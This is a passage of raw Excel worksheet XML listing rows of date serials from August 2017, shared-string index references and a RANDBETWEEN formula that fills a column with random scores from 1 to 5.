        <v>22675</v>
      </c>
      <c r="F24985">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24986" s="1">
        <v>42970.19767361111</v>
      </c>
      <c r="C24986" t="s">
        <v>166</v>
      </c>
      <c r="E24986" t="s">
        <v>22676</v>
      </c>
      <c r="F24986">
        <f t="shared" ca="1" si="390"/>
        <v>3</v>
      </c>
    </row>
    <row r="24987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24987" s="1">
        <v>42970.165995370371</v>
      </c>
      <c r="C24987" t="s">
        <v>41</v>
      </c>
      <c r="E24987" t="s">
        <v>1404</v>
      </c>
      <c r="F24987">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24988" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A24988" s="1">
        <v>42970.092511574076</v>
      </c>
      <c r="C24988" t="s">
        <v>7253</v>
      </c>
      <c r="E24988" s="2" t="s">
        <v>22677</v>
      </c>
      <c r="F24988">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="24989" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24989" s="1">
        <v>42969.951574074075</v>
      </c>
      <c r="C24989" t="s">
        <v>6</v>
      </c>
      <c r="D24989" t="s">
        <v>1993</v>
      </c>
      <c r="E24989" s="2" t="s">
        <v>22678</v>
      </c>
      <c r="F24989">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24990" s="1">
        <v>42969.944745370369</v>
      </c>
      <c r="C24990" t="s">
        <v>10</v>
      </c>
      <c r="D24990" t="s">
        <v>107</v>
      </c>
      <c r="E24990" t="s">
        <v>22679</v>
      </c>
      <c r="F24990">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24991" s="1">
        <v>42969.904432870368</v>
      </c>
      <c r="C24991" t="s">
        <v>10</v>
      </c>
      <c r="D24991" t="s">
        <v>6</v>
      </c>
      <c r="E24991" t="s">
        <v>22680</v>
      </c>
      <c r="F24991">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="24992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24992" s="1">
        <v>42969.837789351855</v>
      </c>
      <c r="C24992" t="s">
        <v>10</v>
      </c>
      <c r="D24992" t="s">
        <v>6</v>
      </c>
      <c r="E24992" t="s">
        <v>22681</v>
      </c>
      <c r="F24992">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="24993" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24993" s="1">
        <v>42969.728518518517</v>
      </c>
      <c r="C24993" t="s">
        <v>6</v>
      </c>
      <c r="D24993" t="s">
        <v>194</v>
      </c>
      <c r="E24993" s="2" t="s">
        <v>22682</v>
      </c>
      <c r="F24993">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24994" s="1">
        <v>42969.722222222219</v>
      </c>
      <c r="C24994" t="s">
        <v>48</v>
      </c>
      <c r="E24994" t="s">
        <v>22683</v>
      </c>
      <c r="F24994">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24995" s="1">
        <v>42969.721747685187</v>
      </c>
      <c r="C24995" t="s">
        <v>10</v>
      </c>
      <c r="D24995" t="s">
        <v>112</v>
      </c>
      <c r="E24995" t="s">
        <v>22684</v>
      </c>
      <c r="F24995">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="24996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24996" s="1">
        <v>42969.702766203707</v>
      </c>
      <c r="C24996" t="s">
        <v>6</v>
      </c>
      <c r="D24996" t="s">
        <v>25</v>
      </c>
      <c r="E24996" t="s">
        <v>22685</v>
      </c>
      <c r="F24996">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="24997" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24997" s="1">
        <v>42969.672384259262</v>
      </c>
      <c r="C24997" t="s">
        <v>41</v>
      </c>
      <c r="E24997" s="2" t="s">
        <v>22686</v>
      </c>
      <c r="F24997">
        <f t="shared" ca="1" si="390"/>
        <v>3</v>
      </c>
    </row>
    <row r="24998" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A24998" s="1">
        <v>42969.661759259259</v>
      </c>
      <c r="C24998" t="s">
        <v>10</v>
      </c>
      <c r="D24998" t="s">
        <v>20</v>
      </c>
      <c r="E24998" s="2" t="s">
        <v>22687</v>
      </c>
      <c r="F24998">
        <f t="shared" ca="1" si="390"/>
        <v>3</v>
      </c>
    </row>
    <row r="24999" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24999" s="1">
        <v>42969.645995370367</v>
      </c>
      <c r="C24999" t="s">
        <v>163</v>
      </c>
      <c r="E24999" t="s">
        <v>22688</v>
      </c>
      <c r="F24999">
        <f t="shared" ca="1" si="390"/>
        <v>3</v>
      </c>
    </row>
    <row r="25000" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25000" s="1">
        <v>42969.62804398148</v>
      </c>
      <c r="C25000" t="s">
        <v>10</v>
      </c>
      <c r="D25000" t="s">
        <v>52</v>
      </c>
      <c r="E25000" s="2" t="s">
        <v>22689</v>
      </c>
      <c r="F25000">
        <f t="shared" ca="1" si="390"/>
        <v>1</v>
      </c>
    </row>
    <row r="25001" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25001" s="1">
        <v>42969.625659722224</v>
      </c>
      <c r="C25001" t="s">
        <v>10</v>
      </c>
      <c r="D25001" t="s">
        <v>52</v>
      </c>
      <c r="E25001" t="s">
        <v>22690</v>
      </c>
      <c r="F25001">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="25002" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25002" s="1">
        <v>42969.601759259262</v>
      </c>
      <c r="C25002" t="s">
        <v>10</v>
      </c>
      <c r="D25002" t="s">
        <v>89</v>
      </c>
      <c r="E25002" s="2" t="s">
        <v>22691</v>
      </c>
      <c r="F25002">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="25003" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25003" s="1">
        <v>42969.59134259259</v>
      </c>
      <c r="C25003" t="s">
        <v>6</v>
      </c>
      <c r="D25003" t="s">
        <v>25</v>
      </c>
      <c r="E25003" t="s">
        <v>22692</v>
      </c>
      <c r="F25003">
        <f t="shared" ca="1" si="390"/>
        <v>1</v>
      </c>
    </row>
    <row r="25004" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25004" s="1">
        <v>42969.579247685186</v>
      </c>
      <c r="C25004" t="s">
        <v>10</v>
      </c>
      <c r="D25004" t="s">
        <v>46</v>
      </c>
      <c r="E25004" s="2" t="s">
        <v>22693</v>
      </c>
      <c r="F25004">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="25005" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25005" s="1">
        <v>42969.548067129632</v>
      </c>
      <c r="C25005" t="s">
        <v>10</v>
      </c>
      <c r="D25005" t="s">
        <v>6</v>
      </c>
      <c r="E25005" t="s">
        <v>22694</v>
      </c>
      <c r="F25005">
        <f t="shared" ca="1" si="390"/>
        <v>3</v>
      </c>
    </row>
    <row r="25006" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25006" s="1">
        <v>42969.533784722225</v>
      </c>
      <c r="C25006" t="s">
        <v>542</v>
      </c>
      <c r="E25006" t="s">
        <v>22695</v>
      </c>
      <c r="F25006">
        <f t="shared" ca="1" si="390"/>
        <v>3</v>
      </c>
    </row>
    <row r="25007" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A25007" s="1">
        <v>42969.520428240743</v>
      </c>
      <c r="C25007" t="s">
        <v>10</v>
      </c>
      <c r="D25007" t="s">
        <v>1036</v>
      </c>
      <c r="E25007" s="2" t="s">
        <v>22696</v>
      </c>
      <c r="F25007">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="25008" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A25008" s="1">
        <v>42969.517523148148</v>
      </c>
      <c r="C25008" t="s">
        <v>10</v>
      </c>
      <c r="D25008" t="s">
        <v>244</v>
      </c>
      <c r="E25008" s="2" t="s">
        <v>22697</v>
      </c>
      <c r="F25008">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="25009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25009" s="1">
        <v>42969.515069444446</v>
      </c>
      <c r="C25009" t="s">
        <v>48</v>
      </c>
      <c r="E25009" t="s">
        <v>22698</v>
      </c>
      <c r="F25009">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="25010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25010" s="1">
        <v>42969.509363425925</v>
      </c>
      <c r="C25010" t="s">
        <v>6</v>
      </c>
      <c r="D25010" t="s">
        <v>25</v>
      </c>
      <c r="E25010" t="s">
        <v>22699</v>
      </c>
      <c r="F25010">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="25011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25011" s="1">
        <v>42969.476493055554</v>
      </c>
      <c r="C25011" t="s">
        <v>10</v>
      </c>
      <c r="D25011" t="s">
        <v>20</v>
      </c>
      <c r="E25011" t="s">
        <v>22700</v>
      </c>
      <c r="F25011">
        <f t="shared" ca="1" si="390"/>
        <v>1</v>
      </c>
    </row>
    <row r="25012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25012" s="1">
        <v>42969.47315972222</v>
      </c>
      <c r="C25012" t="s">
        <v>10</v>
      </c>
      <c r="D25012" t="s">
        <v>52</v>
      </c>
      <c r="E25012" t="s">
        <v>22701</v>
      </c>
      <c r="F25012">
        <f t="shared" ca="1" si="390"/>
        <v>1</v>
      </c>
    </row>
    <row r="25013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25013" s="1">
        <v>42969.461782407408</v>
      </c>
      <c r="C25013" t="s">
        <v>10</v>
      </c>
      <c r="D25013" t="s">
        <v>80</v>
      </c>
      <c r="E25013" t="s">
        <v>22702</v>
      </c>
      <c r="F25013">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="25014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25014" s="1">
        <v>42969.450416666667</v>
      </c>
      <c r="C25014" t="s">
        <v>10</v>
      </c>
      <c r="D25014" t="s">
        <v>14</v>
      </c>
      <c r="E25014" t="s">
        <v>22703</v>
      </c>
      <c r="F25014">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="25015" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25015" s="1">
        <v>42969.445555555554</v>
      </c>
      <c r="C25015" t="s">
        <v>41</v>
      </c>
      <c r="E25015" s="2" t="s">
        <v>22704</v>
      </c>
      <c r="F25015">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="25016" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25016" s="1">
        <v>42969.43681712963</v>
      </c>
      <c r="C25016" t="s">
        <v>10</v>
      </c>
      <c r="D25016" t="s">
        <v>46</v>
      </c>
      <c r="E25016" s="2" t="s">
        <v>22705</v>
      </c>
      <c r="F25016">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="25017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25017" s="1">
        <v>42969.392928240741</v>
      </c>
      <c r="C25017" t="s">
        <v>6</v>
      </c>
      <c r="D25017" t="s">
        <v>25</v>
      </c>
      <c r="E25017" t="s">
        <v>22706</v>
      </c>
      <c r="F25017">
        <f t="shared" ca="1" si="390"/>
        <v>5</v>
      </c>
    </row>
    <row r="25018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25018" s="1">
        <v>42969.392905092594</v>
      </c>
      <c r="C25018" t="s">
        <v>6</v>
      </c>
      <c r="D25018" t="s">
        <v>25</v>
      </c>
      <c r="E25018" t="s">
        <v>22706</v>
      </c>
      <c r="F25018">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="25019" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25019" s="1">
        <v>42969.385451388887</v>
      </c>
      <c r="C25019" t="s">
        <v>6</v>
      </c>
      <c r="D25019" t="s">
        <v>194</v>
      </c>
      <c r="E25019" s="2" t="s">
        <v>22707</v>
      </c>
      <c r="F25019">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="25020" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A25020" s="1">
        <v>42969.369375000002</v>
      </c>
      <c r="C25020" t="s">
        <v>4970</v>
      </c>
      <c r="E25020" s="2" t="s">
        <v>22708</v>
      </c>
      <c r="F25020">
        <f t="shared" ca="1" si="390"/>
        <v>3</v>
      </c>
    </row>
    <row r="25021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25021" s="1">
        <v>42969.256261574075</v>
      </c>
      <c r="C25021" t="s">
        <v>41</v>
      </c>
      <c r="E25021" t="s">
        <v>22709</v>
      </c>
      <c r="F25021">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="25022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25022" s="1">
        <v>42969.241770833331</v>
      </c>
      <c r="C25022" t="s">
        <v>50</v>
      </c>
      <c r="E25022" t="s">
        <v>22710</v>
      </c>
      <c r="F25022">
        <f t="shared" ca="1" si="390"/>
        <v>1</v>
      </c>
    </row>
    <row r="25023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25023" s="1">
        <v>42969.237511574072</v>
      </c>
      <c r="C25023" t="s">
        <v>535</v>
      </c>
      <c r="E25023" t="s">
        <v>22711</v>
      </c>
      <c r="F25023">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="25024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25024" s="1">
        <v>42969.219293981485</v>
      </c>
      <c r="C25024" t="s">
        <v>71</v>
      </c>
      <c r="E25024" t="s">
        <v>22712</v>
      </c>
      <c r="F25024">
        <f t="shared" ca="1" si="390"/>
        <v>4</v>
      </c>
    </row>
    <row r="25025" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25025" s="1">
        <v>42969.193067129629</v>
      </c>
      <c r="C25025" t="s">
        <v>430</v>
      </c>
      <c r="E25025" s="2" t="s">
        <v>22713</v>
      </c>
      <c r="F25025">
        <f t="shared" ca="1" si="390"/>
        <v>2</v>
      </c>
    </row>
    <row r="25026" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25026" s="1">
        <v>42969.189432870371</v>
      </c>
      <c r="C25026" t="s">
        <v>454</v>
      </c>
      <c r="E25026" s="2" t="s">
        <v>22714</v>
      </c>
      <c r="F25026">
        <f t="shared" ref="F25026:F25089" ca="1" si="391">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="25027" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A25027" s="1">
        <v>42969.178935185184</v>
      </c>
      <c r="C25027" t="s">
        <v>189</v>
      </c>
      <c r="E25027" s="2" t="s">
        <v>22715</v>
      </c>
      <c r="F25027">
        <f t="shared" ca="1" si="391"/>
        <v>4</v>
      </c>
    </row>
    <row r="25028" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25028" s="1">
        <v>42969.169768518521</v>
      </c>
      <c r="C25028" t="s">
        <v>140</v>
      </c>
      <c r="D25028" t="s">
        <v>141</v>
      </c>
      <c r="E25028" t="s">
        <v>22716</v>
      </c>
      <c r="F25028">
        <f t="shared" ca="1" si="391"/>
        <v>3</v>
      </c>
    </row>
    <row r="25029" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A25029" s="1">
        <v>42969.154444444444</v>
      </c>
      <c r="C25029" t="s">
        <v>10</v>
      </c>
      <c r="D25029" t="s">
        <v>6</v>
      </c>
      <c r="E25029" s="2" t="s">
        <v>22717</v>
      </c>
      <c r="F25029">
        <f t="shared" ca="1" si="391"/>
        <v>5</v>
      </c>
    </row>
    <row r="25030" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25030" s="1">
        <v>42969.123622685183</v>
      </c>
      <c r="C25030" t="s">
        <v>229</v>
      </c>
      <c r="E25030" s="2" t="s">
        <v>22718</v>
      </c>
      <c r="F25030">
        <f t="shared" ca="1" si="391"/>
        <v>3</v>
      </c>
    </row>
    <row r="25031" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25031" s="1">
        <v>42969.114664351851</v>
      </c>
      <c r="C25031" t="s">
        <v>71</v>
      </c>
      <c r="E25031" s="2" t="s">
        <v>22719</v>
      </c>
      <c r="F25031">
        <f t="shared" ca="1" si="391"/>
        <v>3</v>
      </c>
    </row>
    <row r="25032" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25032" s="1">
        <v>42969.109791666669</v>
      </c>
      <c r="C25032" t="s">
        <v>71</v>
      </c>
      <c r="E25032" s="2" t="s">
        <v>22720</v>
      </c>
      <c r="F25032">
        <f t="shared" ca="1" si="391"/>
        <v>3</v>
      </c>
    </row>
    <row r="25033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25033" s="1">
        <v>42969.052395833336</v>
      </c>
      <c r="C25033" t="s">
        <v>140</v>
      </c>
      <c r="D25033" t="s">
        <v>847</v>
      </c>
      <c r="E25033" t="s">
        <v>22721</v>
      </c>
      <c r="F25033">
        <f t="shared" ca="1" si="391"/>
        <v>1</v>
      </c>
    </row>
    <row r="25034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25034" s="1">
        <v>42969.052349537036</v>
      </c>
      <c r="C25034" t="s">
        <v>140</v>
      </c>
      <c r="D25034" t="s">
        <v>847</v>
      </c>
      <c r="E25034" t="s">
        <v>22721</v>
      </c>
      <c r="F25034">
        <f t="shared" ca="1" si="391"/>
        <v>4</v>
      </c>
    </row>
    <row r="25035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25035" s="1">
        <v>42968.838090277779</v>
      </c>
      <c r="C25035" t="s">
        <v>144</v>
      </c>
      <c r="E25035" t="s">
        <v>22722</v>
      </c>
      <c r="F25035">
        <f t="shared" ca="1" si="391"/>
        <v>5</v>
      </c>
    </row>
    <row r="25036" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A25036" s="1">
        <v>42968.777395833335</v>
      </c>
      <c r="C25036" t="s">
        <v>10</v>
      </c>
      <c r="D25036" t="s">
        <v>33</v>
      </c>
      <c r="E25036" s="2" t="s">
        <v>22723</v>
      </c>
      <c r="F25036">
        <f t="shared" ca="1" si="391"/>
        <v>2</v>
      </c>
    </row>
    <row r="25037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25037" s="1">
        <v>42968.746481481481</v>
      </c>
      <c r="C25037" t="s">
        <v>10</v>
      </c>
      <c r="D25037" t="s">
        <v>229</v>
      </c>
      <c r="E25037" t="s">
        <v>22724</v>
      </c>
      <c r="F25037">
        <f t="shared" ca="1" si="391"/>
        <v>2</v>
      </c>
    </row>
    <row r="25038" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A25038" s="1">
        <v>42968.722893518519</v>
      </c>
      <c r="C25038" t="s">
        <v>134</v>
      </c>
      <c r="E25038" s="2" t="s">
        <v>22725</v>
      </c>
      <c r="F25038">
        <f t="shared" ca="1" si="391"/>
        <v>1</v>
      </c>
    </row>
    <row r="25039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25039" s="1">
        <v>42968.711828703701</v>
      </c>
      <c r="C25039" t="s">
        <v>10</v>
      </c>
      <c r="D25039" t="s">
        <v>6</v>
      </c>
      <c r="E25039" t="s">
        <v>22726</v>
      </c>
      <c r="F25039">
        <f t="shared" ca="1" si="391"/>
        <v>4</v>
      </c>
    </row>
    <row r="25040" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A25040" s="1">
        <v>42968.690196759257</v>
      </c>
      <c r="C25040" t="s">
        <v>10</v>
      </c>
      <c r="D25040" t="s">
        <v>17</v>
      </c>
      <c r="E25040" s="2" t="s">
        <v>22727</v>
      </c>
      <c r="F25040">
        <f t="shared" ca="1" si="391"/>
        <v>4</v>
      </c>
    </row>
    <row r="25041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25041" s="1">
        <v>42968.688333333332</v>
      </c>
      <c r="C25041" t="s">
        <v>10</v>
      </c>
      <c r="D25041" t="s">
        <v>6</v>
      </c>
      <c r="E25041" t="s">
        <v>22728</v>
      </c>
      <c r="F25041">
        <f t="shared" ca="1" si="391"/>
        <v>4</v>
      </c>
    </row>
    <row r="25042" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25042" s="1">
        <v>42968.682905092595</v>
      </c>
      <c r="C25042" t="s">
        <v>10</v>
      </c>
      <c r="D25042" t="s">
        <v>17</v>
      </c>
      <c r="E25042" s="2" t="s">
        <v>22729</v>
      </c>
      <c r="F25042">
        <f t="shared" ca="1" si="391"/>
        <v>4</v>
      </c>
    </row>
    <row r="25043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25043" s="1">
        <v>42968.666481481479</v>
      </c>
      <c r="C25043" t="s">
        <v>10</v>
      </c>
      <c r="D25043" t="s">
        <v>52</v>
      </c>
      <c r="E25043" t="s">
        <v>22730</v>
      </c>
      <c r="F25043">
        <f t="shared" ca="1" si="391"/>
        <v>5</v>
      </c>
    </row>
    <row r="25044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25044" s="1">
        <v>42968.6406712963</v>
      </c>
      <c r="C25044" t="s">
        <v>10</v>
      </c>
      <c r="E25044" t="s">
        <v>22731</v>
      </c>
      <c r="F25044">
        <f t="shared" ca="1" si="391"/>
        <v>1</v>
      </c>
    </row>
    <row r="25045" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25045" s="1">
        <v>42968.63318287037</v>
      </c>
      <c r="C25045" t="s">
        <v>10</v>
      </c>
      <c r="D25045" t="s">
        <v>36</v>
      </c>
      <c r="E25045" t="s">
        <v>22732</v>
      </c>
      <c r="F25045">
        <f t="shared" ca="1" si="391"/>
        <v>3</v>
      </c>
    </row>
    <row r="25046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25046" s="1">
        <v>42968.597569444442</v>
      </c>
      <c r="C25046" t="s">
        <v>10</v>
      </c>
      <c r="D25046" t="s">
        <v>52</v>
      </c>
      <c r="E25046" t="s">
        <v>22733</v>
      </c>
      <c r="F25046">
        <f t="shared" ca="1" si="391"/>
        <v>2</v>
      </c>
    </row>
    <row r="25047" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25047" s="1">
        <v>42968.595891203702</v>
      </c>
      <c r="C25047" t="s">
        <v>10</v>
      </c>
      <c r="D25047" t="s">
        <v>80</v>
      </c>
      <c r="E25047" t="s">
        <v>22734</v>
      </c>
      <c r="F25047">
        <f t="shared" ca="1" si="391"/>
        <v>2</v>
      </c>
    </row>
    <row r="25048" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25048" s="1">
        <v>42968.58079861111</v>
      </c>
      <c r="C25048" t="s">
        <v>6</v>
      </c>
      <c r="D25048" t="s">
        <v>25</v>
      </c>
      <c r="E25048" s="2" t="s">
        <v>22735</v>
      </c>
      <c r="F25048">
        <f t="shared" ca="1" si="391"/>
        <v>5</v>
      </c>
    </row>
    <row r="25049" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25049" s="1">
        <v>42968.513402777775</v>
      </c>
      <c r="C25049" t="s">
        <v>48</v>
      </c>
      <c r="E25049" s="2" t="s">
        <v>22736</v>
      </c>
      <c r="F25049">
        <f t="shared" ca="1" si="391"/>
        <v>4</v>
      </c>
    </row>
    <row r="25050" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25050" s="1">
        <v>42968.501886574071</v>
      </c>
      <c r="C25050" t="s">
        <v>97</v>
      </c>
      <c r="E25050" t="s">
        <v>22737</v>
      </c>
      <c r="F25050">
        <f t="shared" ca="1" si="391"/>
        <v>1</v>
      </c>
    </row>
    <row r="25051" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25051" s="1">
        <v>42968.455347222225</v>
      </c>
      <c r="C25051" t="s">
        <v>48</v>
      </c>
      <c r="E25051" t="s">
        <v>22738</v>
      </c>
      <c r="F25051">
        <f t="shared" ca="1" si="391"/>
        <v>2</v>
      </c>
    </row>
    <row r="25052" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A25052" s="1">
        <v>42968.420289351852</v>
      </c>
      <c r="C25052" t="s">
        <v>48</v>
      </c>
      <c r="E25052" s="2" t="s">
        <v>22739</v>
      </c>
      <c r="F25052">
        <f t="shared" ca="1" si="391"/>
        <v>5</v>
      </c>
    </row>
    <row r="25053" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25053" s="1">
        <v>42968.393900462965</v>
      </c>
      <c r="C25053" t="s">
        <v>41</v>
      </c>
      <c r="E25053" t="s">
        <v>22740</v>
      </c>
      <c r="F25053">
        <f t="shared" ca="1" si="391"/>
        <v>4</v>
      </c>
    </row>
    <row r="25054" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A25054" s="1">
        <v>42968.379432870373</v>
      </c>
      <c r="C25054" t="s">
        <v>71</v>
      </c>
      <c r="E25054" s="2" t="s">
        <v>22741</v>
      </c>
      <c r="F25054">
        <f t="shared" ca="1" si="391"/>
        <v>5</v>
      </c>
    </row>
    <row r="25055" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25055" s="1">
        <v>42968.376458333332</v>
      </c>
      <c r="C25055" t="s">
        <v>60</v>
      </c>
      <c r="E25055" t="s">
        <v>22742</v>
      </c>
      <c r="F25055">
        <f t="shared" ca="1" si="391"/>
        <v>2</v>
      </c>
    </row>
    <row r="25056" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25056" s="1">
        <v>42968.359120370369</v>
      </c>
      <c r="C25056" t="s">
        <v>41</v>
      </c>
      <c r="E25056" t="s">
        <v>22743</v>
      </c>
      <c r="F25056">
        <f t="shared" ca="1" si="391"/>
        <v>1</v>
      </c>
    </row>
    <row r="25057" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25057" s="1">
        <v>42968.256736111114</v>
      </c>
      <c r="C25057" t="s">
        <v>69</v>
      </c>
      <c r="E25057" s="2" t="s">
        <v>22744</v>
      </c>
      <c r="F25057">
        <f t="shared" ca="1" si="391"/>
        <v>5</v>
      </c>
    </row>
    <row r="25058" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A25058" s="1">
        <v>42968.251284722224</v>
      </c>
      <c r="C25058" t="s">
        <v>41</v>
      </c>
      <c r="E25058" s="2" t="s">
        <v>22745</v>
      </c>
      <c r="F25058">
        <f t="shared" ca="1" si="391"/>
        <v>1</v>
      </c>
    </row>
    <row r="25059" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A25059" s="1">
        <v>42968.195567129631</v>
      </c>
      <c r="C25059" t="s">
        <v>41</v>
      </c>
      <c r="E25059" s="2" t="s">
        <v>22746</v>
      </c>
      <c r="F25059">
        <f t="shared" ca="1" si="391"/>
        <v>2</v>
      </c>
    </row>
    <row r="25060" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25060" s="1">
        <v>42968.189212962963</v>
      </c>
      <c r="C25060" t="s">
        <v>10</v>
      </c>
      <c r="D25060" t="s">
        <v>163</v>
      </c>
      <c r="E25060" t="s">
        <v>22747</v>
      </c>
      <c r="F25060">
        <f t="shared" ca="1" si="391"/>
        <v>5</v>
      </c>
    </row>
    <row r="25061" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25061" s="1">
        <v>42968.173645833333</v>
      </c>
      <c r="C25061" t="s">
        <v>71</v>
      </c>
      <c r="E25061" s="2" t="s">
        <v>22748</v>
      </c>
      <c r="F25061">
        <f t="shared" ca="1" si="391"/>
        <v>5</v>
      </c>
    </row>
    <row r="25062" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25062" s="1">
        <v>42968.153263888889</v>
      </c>
      <c r="C25062" t="s">
        <v>118</v>
      </c>
      <c r="E25062" s="2" t="s">
        <v>22749</v>
      </c>
      <c r="F25062">
        <f t="shared" ca="1" si="391"/>
        <v>2</v>
      </c>
    </row>
    <row r="25063" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25063" s="1">
        <v>42968.089560185188</v>
      </c>
      <c r="C25063" t="s">
        <v>408</v>
      </c>
      <c r="E25063" s="2" t="s">
        <v>22750</v>
      </c>
      <c r="F25063">
        <f t="shared" ca="1" si="391"/>
        <v>4</v>
      </c>
    </row>
    <row r="25064" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A25064" s="1">
        <v>42968.06621527778</v>
      </c>
      <c r="C25064" t="s">
        <v>319</v>
      </c>
